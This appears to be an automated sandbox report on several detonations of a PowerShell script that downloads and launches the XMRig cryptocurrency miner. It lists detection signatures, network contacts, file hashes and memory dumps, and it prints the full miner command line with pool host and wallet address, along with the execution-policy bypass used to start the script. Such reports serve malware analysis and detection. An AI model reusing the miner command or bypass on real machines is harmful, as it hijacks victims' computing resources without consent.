memory/3524-59-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-60-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-61-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-62-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-63-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-64-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-65-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-66-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-67-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-68-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-69-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-70-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-71-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-72-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-73-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-74-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-75-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-76-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-77-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-78-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-79-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-80-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-81-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-82-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-83-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-84-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-85-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-86-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-87-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-88-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-89-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-90-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-91-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-92-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-93-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-94-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-95-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-96-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-97-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-98-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-99-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-100-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-101-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-102-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-103-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-104-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-105-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-106-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-107-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-108-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-109-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-110-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-111-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-112-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-113-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-114-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-115-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-116-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

memory/3524-117-0x00007FF62D830000-0x00007FF62E463000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:55

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000001ED76C30000-0x000001ED76C52000-memory.dmp

memory/4988-9-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-8-0x000001ED76F00000-0x000001ED76F76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1qnq1y5.cb4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-48-0x000001ED77080000-0x000001ED77092000-memory.dmp

memory/4988-61-0x000001ED767A0000-0x000001ED767AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4788-90-0x0000020F038F0000-0x0000020F03910000-memory.dmp

memory/4788-91-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4988-93-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4788-92-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4988-94-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4788-95-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-96-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-97-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-98-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-99-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-100-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-101-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-102-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-103-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-104-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-105-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-106-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-107-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-108-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-109-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-110-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-111-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-112-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-113-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-114-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-115-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-116-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-117-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-118-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-119-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-120-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-121-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-122-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-123-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-124-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-125-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-126-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-127-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-128-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-129-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-130-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-131-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-132-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-133-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-134-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-135-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-136-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-137-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-138-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-139-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-140-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-141-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-142-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-143-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-144-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-145-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-146-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-147-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-148-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-149-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-150-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-151-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-152-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-153-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-154-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

memory/4788-155-0x00007FF60C790000-0x00007FF60D3C3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:17

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/516-3-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp

memory/516-5-0x0000029220730000-0x0000029220752000-memory.dmp

memory/516-8-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-9-0x00000292208E0000-0x0000029220956000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxsjvzya.lba.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/516-10-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-25-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-48-0x0000029220A80000-0x0000029220A92000-memory.dmp

memory/516-61-0x0000029220A60000-0x0000029220A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4828-90-0x0000015A78570000-0x0000015A78590000-memory.dmp

memory/4828-91-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/516-93-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp

memory/4828-92-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/516-94-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/516-95-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp

memory/4828-96-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-97-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-98-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-99-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-100-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-101-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-102-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-103-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-104-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-105-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-106-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-107-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-108-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-109-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-110-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-111-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-112-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-113-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-114-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-115-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-116-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-117-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-118-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-119-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-120-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-121-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-122-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-123-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-124-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-125-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-126-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-127-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-128-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-129-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-130-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-131-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-132-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-133-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-134-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-135-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-136-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-137-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-138-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-139-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-140-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-141-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-142-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-143-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-144-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-145-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-146-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-147-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-148-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-149-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-150-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-151-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-152-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-153-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-154-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-155-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

memory/4828-156-0x00007FF6D3E00000-0x00007FF6D4A33000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:10

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

